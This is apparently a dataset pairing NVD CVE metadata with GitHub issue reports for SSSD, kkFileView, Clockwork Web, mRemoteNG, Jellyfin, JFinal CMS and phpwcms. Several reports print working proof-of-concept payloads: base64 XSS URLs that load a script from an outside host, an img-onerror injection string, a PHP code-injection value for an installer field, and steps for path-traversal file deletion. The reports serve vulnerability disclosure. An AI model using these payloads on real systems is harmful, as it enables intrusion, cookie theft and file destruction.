Cloned from Pagure issue: https://pagure.io/SSSD/sssd/issue/4180 - Created at 2020-04-28 17:25:00 by [darkcipher](https://pagure.io/user/darkcipher) - Assigned to [sbose](https://pagure.io/user/sbose) - Associated bugzillas - https://bugzilla.redhat.com/show_bug.cgi?id=1780404 --- I'm having an issue getting a maprule to work properly. It looks like sssd isn't sanitizing certificate attributes prior to issuing the ldap search. In this example, parentheses in the Subject DN are causing an ldap search error "Bad search filter." At the end of the example, I show the Bad search filter result from sssd and a working ldapsearch with backslash-escaped parentheses. Additionally, altSecurityIdentities in LDAP stores a space between UID (OID...) and CN. AD is able to find and match the certificate to user when the Certificate uses a + to separate these values. I don't know if this is a standard transformation or if sssd could support a user-configurable transformation like `!ad` for certain character adjustments? The smartcard is an US Government HSPD-12/PIV card. certificate (sssctl cert-show): Issuer: OU=Entrust Managed Services SSP CA,OU=Certification Authorities,O=Entrust,C=US Subject: UID=1337+CN=JOHN GALT (Affiliate),OU=Department of Authentication,O=U.S. Government,C=US SAN type: ntPrincipalName subject_nt_principal=1337@FEDIDCARD.GOV LDAP: altSecurityIdentities: X509:<I>C=US,O=Entrust,OU=Certification Authorities,OU=Entrust Managed Services SSP CA<S>C=US,O=U.S. Government,OU=Department of Authentication,OID.0.9.2342.19200300.100.1.1=1337 CN=JOHN GALT (Affiliate) sssd.conf certmap: [certmap/lol.gov/smartcard] matchrule = <EKU>msScLogin<SAN:ntPrincipalName>^[0-9]+@FEDIDCARD\.GOV$ maprule = (altSecurityIdentities=X509:<I>{issuer_dn!ad}<S>{subject_dn!ad}) domains = lol.gov sdap_attrs_add_ldap_attr: Adding altSecurityIdentities [X509:<I>C=US,O=Entrust,OU=Certification\20Authorities,OU=Entrust\20Managed\20Services\20SSP\20CA<S>C=US,O=U.S.\20Government,OU=Department\20of\20Authentication,OID.0.9.2342.19200300.100.1.1=1337\20CN=JOHN\20GALT\20\28Affiliate\29] to attributes of [galt@lol.gov]. sss-certmap ldap search: [sdap_get_generic_ext_step] (0x0400): calling ldap_search_ext with [(&(&(altSecurityIdentities=X509:<I>C=US,O=Entrust,OU=Certification Authorities,OU=Entrust Managed Services SSP CA<S>C=US,O=U.S. Government,OU=Department of Authentication,OID.0.9.2342.19200300.100.1.1=1337+CN=JOHN GALT (Affiliate))(objectclass=posixAccount)(uid=*)(&(uidNumber=*)(!(uidNumber=0))))(localAuthEnabled=TRUE))] [ou=linux,dc=lol,dc=gov]. [sdap_get_generic_ext_step] (0x0080): ldap_search_ext failed: Bad search filter ldapsearch (working): ldapsearch -x -b ou=linux,dc=lol,dc=gov '(&(&(altSecurityIdentities=X509:<I>C=US,O=Entrust,OU=Certification Authorities,OU=Entrust Managed Services SSP CA<S>C=US,O=U.S. Government,OU=Department of Authentication,OID.0.9.2342.19200300.100.1.1=1337 CN=JOHN GALT \(Affiliate\))(objectclass=posixAccount)(uid=*)(&(uidNumber=*)(!(uidNumber=0))))(localAuthEnabled=TRUE))' ### Comments --- **Comment from [sbose](https://pagure.io/user/sbose) at [2020-04-29 10:43:30](https://pagure.io/SSSD/sssd/issue/4180#644863)** Hi, thank you for the report, this issue was reported at https://bugzilla.redhat.com/show_bug.cgi?id=1780404 (might be restricted) as well. I already had a patch in my tree but forgot to create a pull-request, it is https://github.com/SSSD/sssd/pull/1036 now. If you can tell me on which platform you are using SSSD I can try to prepare a test build with the fix. bye, Sumit --- **Comment from [sbose](https://pagure.io/user/sbose) at [2020-04-29 10:43:43](https://pagure.io/SSSD/sssd/issue/4180#644864)** PR: https://github.com/SSSD/sssd/pull/1036 --- **Comment from [sbose](https://pagure.io/user/sbose) at [2020-04-29 10:43:57](https://pagure.io/SSSD/sssd/issue/4180#644865)** **Metadata Update from @sbose**: - Custom field patch adjusted to on --- **Comment from [sbose](https://pagure.io/user/sbose) at [2020-04-29 10:48:05](https://pagure.io/SSSD/sssd/issue/4180#644866)** **Metadata Update from @sbose**: - Custom field rhbz adjusted to https://bugzilla.redhat.com/show_bug.cgi?id=1780404 --- **Comment from [sbose](https://pagure.io/user/sbose) at [2020-04-29 10:48:06](https://pagure.io/SSSD/sssd/issue/4180#644867)** Issue linked to Bugzilla: [Bug 1780404](https://bugzilla.redhat.com/show_bug.cgi?id=1780404) --- **Comment from [sbose](https://pagure.io/user/sbose) at [2020-04-29 10:48:40](https://pagure.io/SSSD/sssd/issue/4180#644868)** **Metadata Update from @sbose**: - Issue assigned to sbose --- **Comment from [darkcipher](https://pagure.io/user/darkcipher) at [2020-04-29 13:54:44](https://pagure.io/SSSD/sssd/issue/4180#644901)** > Hi, ... > If you can tell me on which platform you are using SSSD I can try to prepare a test build with the fix. Hello. I'm on Ubuntu 20.04. --- **Comment from [darkcipher](https://pagure.io/user/darkcipher) at [2020-04-29 14:05:23](https://pagure.io/SSSD/sssd/issue/4180#644902)** It looks like your pull request will handle the sanitization. Any advise on the "+" issue? Microsoft AD is able to match. Could a `s/+/ /` be a part of the `!ad` filter? --- **Comment from [sbose](https://pagure.io/user/sbose) at [2020-04-29 17:04:22](https://pagure.io/SSSD/sssd/issue/4180#645039)** Hi, yes, in general this is possible but I'm currently searching for some documentation which explains this behavior. It looks your certificate has a multi-valued RDN which is allowed for PIV cards as described in https://www.idmanagement.gov/wp-content/uploads/sites/1171/uploads/Common-Policy-Framework.pdf (search for 'multi-value'). According to https://tools.ietf.org/html/rfc4514 the components of a multi-valued RDN should be concatenated with the reserved character '+'. What I'm currently missing is an explanation why AD does not use the '+' here but a space. Btw, according to https://piv.idmanagement.gov/networkconfig/accounts/ the 'CN' part should come first followed by the 'OID' part which is different in your case. But according to https://permalink.lanl.gov/object/tr?what=info:lanl-repo/lareport/LA-UR-16-21404 section 4.1.1 both versions might be used. bye, Sumit --- **Comment from [darkcipher](https://pagure.io/user/darkcipher) at [2020-04-29 17:37:06](https://pagure.io/SSSD/sssd/issue/4180#645045)** Yes, it's a multi-valued RDN (or Multi AVA) as defined in RFC4514 Section 2. Microsoft says they "support" RFC4514 Section 2 by defining MAX=1 [MS-ADTS Ref](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/3c96b56d-d7a7-46f1-9883-7d031f9fa01e). To me, this means they don't. I think they may just concatenate the multi-values with a space separator. The LDAP servers I'm using have the two values for altSecurityIdentities X509:... one with UID followed by CN, another with CN followed by UID, since LDAP doesn't guarantee order ... in LDAP's world, they are attributes, in MS-AD, they only support one, so concatenate. altSecurityIdentities: X509:<I>C=US,O=Entrust,OU=Certification Authorities,OU=Entrust Managed Services SSP CA<S>C=US,O=U.S. Government,OU=Department of Authentication,OID.0.9.2342.19200300.100.1.1=1337 CN=JOHN GALT (Affiliate) altSecurityIdentities: X509:<I>C=US,O=Entrust,OU=Certification Authorities,OU=Entrust Managed Services SSP CA<S>C=US,O=U.S. Government,OU=Department of Authentication,CN=JOHN GALT (Affiliate) OID.0.9.2342.19200300.100.1.1=1337
Certificate attributes are not sanitized prior to ldap search
https://api.github.com/repos/SSSD/sssd/issues/5135/comments
3
2020-05-02T14:02:53Z
2023-01-06T19:15:40Z
https://github.com/SSSD/sssd/issues/5135
611,197,341
5,135
4,678
CVE-2022-46934
2023-02-01T20:15:10.363
kkFileView v4.1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the url parameter at /controller/OnlinePreviewController.java.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kekingcn/kkFileView/issues/411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kekingcn/kkFileView/issues/411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "3CF7B3A0-ACE8-4EF5-AF51-760E7B2650BF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/kekingcn/kkFileView/issues/411
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kekingcn", "kkFileView" ]
问题描述Description kkFileview v4.1.0存在XSS漏洞,可能导致网站cookies泄露和iframe SSRF。 kkFileview v4.1.0 has an XSS vulnerability, which may lead to the leakage of website cookies and iframe SSRF. 漏洞位置vulerable code location kkFileView/server/src/main/java/cn/keking/web/controller/OnlinePreviewController.java文件59行,"url"参数用户可控,且没有过滤特殊字符就输出到了页面 The vulnerability code is located at line 59 in kkFileView/server/src/main/java/cn/keking/web/controller/OnlinePreviewController.java , The 'url' parameter is user-controllable, and it is output to the page without filtering special characters @GetMapping( "/onlinePreview") public String onlinePreview(String url, Model model, HttpServletRequest req) { String fileUrl; try { fileUrl = WebUtils.decodeUrl(url); } catch (Exception ex) { String errorMsg = String.format(BASE64_DECODE_ERROR_MSG, "url"); return otherFilePreview.notSupportedFile(model, errorMsg); } FileAttribute fileAttribute = fileHandlerService.getFileAttribute(fileUrl, req); model.addAttribute("file", fileAttribute); FilePreview filePreview = previewFactory.get(fileAttribute); logger.info("预览文件url:{},previewType:{}", fileUrl, fileAttribute.getType()); return filePreview.filePreviewHandle(fileUrl, model, fileAttribute); } 漏洞证明PoC 官方演示站点为最新4.1.0版本,以此为演示,访问漏洞位置(url参数值需要经过base64编码): https://file.keking.cn/onlinePreview?url=aHR0cDovLyI+PHNjcmlwdC9zcmM9aHR0cHM6Ly94c3Mucm9ja3MveHNzLmpzPi90ZXN0LnBuZw== ![image](https://user-images.githubusercontent.com/61698045/205609307-dcd3578f-e3c5-4bfd-94b6-de71ef57d1b1.png) https://file.keking.cn/onlinePreview?url=aHR0cDovLyI+PGlmcmFtZS9zcmM9aHR0cHM6Ly91YXQtazhzLmtla2luZy5jbi8gaGVpZ2h0PTEwMDAgd2lkdGg9MTAwMD4vdGVzdC5wbmc= ![image](https://user-images.githubusercontent.com/61698045/205609495-4396d34a-f719-44cd-ac4f-a6f68c71732d.png) The official demo site is the latest version 4.1.0. Take this as a demo to access the vulnerability location (the URL parameter value needs to be Base64 encoded and URL encoded): https://file.keking.cn/onlinePreview?url=aHR0cDovLyI+PHNjcmlwdC9zcmM9aHR0cHM6Ly94c3Mucm9ja3MveHNzLmpzPi90ZXN0LnBuZw== https://file.keking.cn/onlinePreview?url=aHR0cDovLyI+PGlmcmFtZS9zcmM9aHR0cHM6Ly91YXQtazhzLmtla2luZy5jbi8gaGVpZ2h0PTEwMDAgd2lkdGg9MTAwMD4vdGVzdC5wbmc=
kkFileView XSS Vulnerability
https://api.github.com/repos/kekingcn/kkFileView/issues/411/comments
1
2022-12-05T10:04:51Z
2023-01-12T06:50:48Z
https://github.com/kekingcn/kkFileView/issues/411
1,476,176,736
411
4,679
CVE-2023-25015
2023-02-02T04:15:08.107
Clockwork Web before 0.1.2, when Rails before 5.2 is used, allows CSRF.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ankane/clockwork_web/commit/ec2896503ee231588547c2fad4cb93a94e78f857" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ankane/clockwork_web/compare/v0.1.1...v0.1.2" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ankane/clockwork_web/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ankane/clockwork_web/commit/ec2896503ee231588547c2fad4cb93a94e78f857" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ankane/clockwork_web/compare/v0.1.1...v0.1.2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ankane/clockwork_web/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:clockwork_web_project:clockwork_web:*:*:*:*:*:*:*:*", "matchCriteriaId": "2D66182B-0020-4436-8C14-B3EE1F9B82A3", "versionEndExcluding": "0.1.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*", "matchCriteriaId": "8C9163AF-6EEA-4C22-BA5D-74CB55208C9B", "versionEndExcluding": "5.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "352" ]
352
https://github.com/ankane/clockwork_web/issues/4
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ankane", "clockwork_web" ]
Clockwork Web is vulnerable to cross-site request forgery (CSRF) with Rails < 5.2. This vulnerability has been assigned the CVE identifier CVE-2023-25015. Versions Affected: 0.1.1 and below Fixed Versions: 0.1.2 ## Impact Clockwork Web is vulnerable to cross-site request forgery (CSRF) with Rails < 5.2. A CSRF attack works by getting an authorized user to visit a malicious website and then performing requests on behalf of the user. In this instance, actions include enabling and disabling jobs. All users running an affected release on Rails < 5.2 should upgrade immediately.
CSRF Vulnerability
https://api.github.com/repos/ankane/clockwork_web/issues/4/comments
0
2023-02-02T00:45:45Z
2023-02-02T21:30:34Z
https://github.com/ankane/clockwork_web/issues/4
1,567,115,912
4
4,680
CVE-2020-24307
2023-02-02T12:15:08.893
An issue in mRemoteNG v1.76.20 allows attackers to escalate privileges via a crafted executable file. NOTE: third parties were unable to reproduce any scenario in which the claimed access of BUILTIN\Users:(M) is present.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "https://github.com/NyaMeeEain/Infrastructure-Assessment/blob/master/Privilege%20Escalation/Common%20Windows%20Privilege%20Escalation.md" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/mRemoteNG/mRemoteNG/issues/2338" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://packetstormsecurity.com/files/170794/mRemoteNG-1.76.20-Privilege-Escalation.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable" ], "url": "https://github.com/NyaMeeEain/Infrastructure-Assessment/blob/master/Privilege%20Escalation/Common%20Windows%20Privilege%20Escalation.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/mRemoteNG/mRemoteNG/issues/2338" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://packetstormsecurity.com/files/170794/mRemoteNG-1.76.20-Privilege-Escalation.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mremoteng:mremoteng:1.76.20:*:*:*:*:*:*:*", "matchCriteriaId": "9D283F5A-3734-408E-A680-CCB164957112", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "269" ]
269
https://github.com/mRemoteNG/mRemoteNG/issues/2338
null
github.com
[ "mRemoteNG", "mRemoteNG" ]
an exploit has been published, urgently release a version with correction CVE-2020-24307. https://sploitus.com/exploit?id=PACKETSTORM:170794&utm_source=rss&utm_medium=rss
Exploit for mRemoteNG 1.76.20 Privilege Escalation CVE-2020-24307
https://api.github.com/repos/mRemoteNG/mRemoteNG/issues/2338/comments
6
2023-02-03T04:07:29Z
2023-11-08T14:33:48Z
https://github.com/mRemoteNG/mRemoteNG/issues/2338
1,569,179,098
2,338
4,681
CVE-2023-23635
2023-02-03T01:15:14.620
In Jellyfin 10.8.x through 10.8.3, the name of a collection is vulnerable to stored XSS. This allows an attacker to steal access tokens from the localStorage of the victim.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jellyfin/jellyfin-web/issues/3788" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://herolab.usd.de/security-advisories/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://herolab.usd.de/security-advisories/usd-2022-0031/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jellyfin/jellyfin-web/issues/3788" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://herolab.usd.de/security-advisories/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://herolab.usd.de/security-advisories/usd-2022-0031/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*", "matchCriteriaId": "6CF48FD8-1796-4329-BDFD-98A8CC445E62", "versionEndExcluding": null, "versionEndIncluding": "10.8.3", "versionStartExcluding": null, "versionStartIncluding": "10.8.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jellyfin/jellyfin-web/issues/3788
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jellyfin", "jellyfin-web" ]
**Describe The Bug** The aria labels added to cards for accessibility in 10.8 do not properly strip html from item names. **Steps To Reproduce** 1. Edit an item's name property to include a common method of XSS injection (e.g. `"><img src=/X onerror=alert("xss")>`). 2. Navigate to any page with that item's card visible (home screen, library screen, item details screen, etc.). 3. See an alert box is opened with the text "xss". **Expected Behavior** Any html should be escaped in the item name before using it as the label. **Logs** N/A **Screenshots** N/A **System (please complete the following information):** - Platform: All - Browser: All - Jellyfin Version: 10.8.0-10.8.3 **Additional Context** This security vulnerability was reported to Jellyfin by Christian Pöschl of usd AG following Jellyfin's security policy. The issue was reported as Advisory IDs usd-2022-0030 and usd-2022-0031.
Item cards allow XSS via aria label
https://api.github.com/repos/jellyfin/jellyfin-web/issues/3788/comments
0
2022-08-02T17:09:12Z
2022-08-03T00:15:13Z
https://github.com/jellyfin/jellyfin-web/issues/3788
1,326,142,069
3,788
4,682
CVE-2023-22975
2023-02-03T17:15:09.073
A cross-site scripting (XSS) vulnerability in JFinal CMS v5.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the email parameter under /front/person/profile.html.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/53" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jflyfox/jfinal_cms/issues/53
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jflyfox", "jfinal_cms" ]
## Summary There is XSS vulnerability below! The reason for the vulnerability is that there is no filter on user input. According to the guidelines of CMS, We can create a user, and we can control the user's account number, password and email and so on..... ## Exploition After, There are many ways to trigger the vulnerability! The one is that we can make a comment and wait other users to click the user created by ourselves. The another one can get admin's secrect util admin login. OK! We will create a user at first. ![image](https://user-images.githubusercontent.com/121624844/209973101-fee3b650-e7ad-4e3e-b1c4-d9fdf1ccc9d3.png) Press the submit button, we get a alert below ![image](https://user-images.githubusercontent.com/121624844/209974238-daf55fa1-bb3b-44d3-b09c-22a8a6e45ff3.png) we can create a normal user account via this way, and then we can update the information ![image](https://user-images.githubusercontent.com/121624844/209974598-2d39becd-3010-4a64-aaeb-dc5c616640ca.png) ![image](https://user-images.githubusercontent.com/121624844/209974823-4e23736d-8614-4fd7-9b8f-a35f641909ce.png) After we update the user's information, wo would wait! When the admin user login, we can get its secrect! ![image](https://user-images.githubusercontent.com/121624844/209975300-7cf69b95-f617-4834-8075-3d16062950ad.png) ![image](https://user-images.githubusercontent.com/121624844/209975423-b3091bf7-f6d7-445b-ad87-3f9c3d11315a.png)
XSS vulnerability exists in jfinal_cms V5.1.0
https://api.github.com/repos/jflyfox/jfinal_cms/issues/53/comments
1
2022-12-29T15:35:31Z
2022-12-29T15:35:55Z
https://github.com/jflyfox/jfinal_cms/issues/53
1,513,842,062
53
4,683
CVE-2021-36424
2023-02-03T18:15:09.200
An issue discovered in phpwcms 1.9.25 allows remote attackers to run arbitrary code via DB user field during installation.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/slackero/phpwcms/issues/310" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/slackero/phpwcms/issues/310" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpwcms:phpwcms:*:*:*:*:*:*:*:*", "matchCriteriaId": "684A8278-6B9C-4D17-A80E-7E59850A0ECD", "versionEndExcluding": "1.9.26", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/slackero/phpwcms/issues/310
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "slackero", "phpwcms" ]
进入安装流程,在MySQL database settings处输入payload:`root\';phpinfo();//` Enter the installation process, enter the payload in the MySQL database settings: `root\';phpinfo();//` ![1624353999296](https://user-images.githubusercontent.com/55659004/123062542-34469080-d43f-11eb-83f9-531226346f3d.png) 点击Continue。重新刷新页面,执行php代码 Click Continue. Re-refresh the page and execute the php code ![1624354054503](https://user-images.githubusercontent.com/55659004/123062566-390b4480-d43f-11eb-90d5-ab0b49c37046.png) 在`setup/inc/setup.func.inc.php` 的`write_conf_file`中对外部输入参数进行了过滤并拼接 The external input parameters are filtered and spliced in the `write_conf_file` of `setup/inc/setup.func.inc.php` ![1624354234211](https://user-images.githubusercontent.com/55659004/123062579-3c063500-d43f-11eb-9c65-10a19ca75fac.png) 过滤替换`'`为`\'`,输入`\'`将被替换为`\\'`,前面的`\`将后面的`\`进行了转义导致其失效。 Filtering replaces `'` with `\'`, inputting `\'` will be replaced with `\\'`, the front `\` will escape the following `\` to make it invalid. ![1624354344281](https://user-images.githubusercontent.com/55659004/123062593-3f99bc00-d43f-11eb-8b1a-7f9ea6dd14a9.png) 最终结果 Final Results ![1624354441095](https://user-images.githubusercontent.com/55659004/123062604-4294ac80-d43f-11eb-9ba9-9dded4da1ccb.png)
Code execution during installation
https://api.github.com/repos/slackero/phpwcms/issues/310/comments
1
2021-06-23T08:24:48Z
2021-06-24T10:27:21Z
https://github.com/slackero/phpwcms/issues/310
927,992,957
310
4,684
CVE-2021-36425
2023-02-03T18:15:09.300
Directory traversal vulnerability in phpcms 1.9.25 allows remote attackers to delete arbitrary files via unfiltered $file parameter to unlink method in include/inc_act/act_ftptakeover.php file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/slackero/phpwcms/issues/311" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/slackero/phpwcms/issues/311" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpwcms:phpwcms:*:*:*:*:*:*:*:*", "matchCriteriaId": "684A8278-6B9C-4D17-A80E-7E59850A0ECD", "versionEndExcluding": "1.9.26", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/slackero/phpwcms/issues/311
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "slackero", "phpwcms" ]
在`include/inc_act/act_ftptakeover.php` 334行中,传入`unlink`方法的变量`$file`并未做过滤,导致可以使用../这种形式进行目录穿越删除任意文件。 In the 334 line of `include/inc_act/act_ftptakeover.php`, the variable file passed in the `unlink` method is not filtered, so that the form of ../ can be used for directory traversal to delete any `$file`. ![image](https://user-images.githubusercontent.com/55659004/124229219-da7d4f00-db3f-11eb-8928-5415f37e3d64.png) ![image](https://user-images.githubusercontent.com/55659004/124229388-1ca69080-db40-11eb-8fc4-343a37297fb2.png) 漏洞复现: Vulnerability recurrence: 登录访问后台页面http://www.pw.com/phpwcms.php?csrftoken=0cc175b9c0f1b6a831c399e269772661&do=files&p=8 首先上传文件后,选中第一个文件,点击take over selected files Login to visit the background page http://www.pw.com/phpwcms.php?csrftoken=0cc175b9c0f1b6a831c399e269772661&do=files&p=8 After uploading files first, select the first file and click take over selected files ![image](https://user-images.githubusercontent.com/55659004/124229703-98084200-db40-11eb-8922-df11b5680f0b.png) 使用burpsuite抓包,修改第一个文件的字段段属性,对内容进行base64解码修改为`../_.htaccess`并再次编码,尝试删除根目录下_.htaccess文件 Use burpsuite to capture packets, modify the 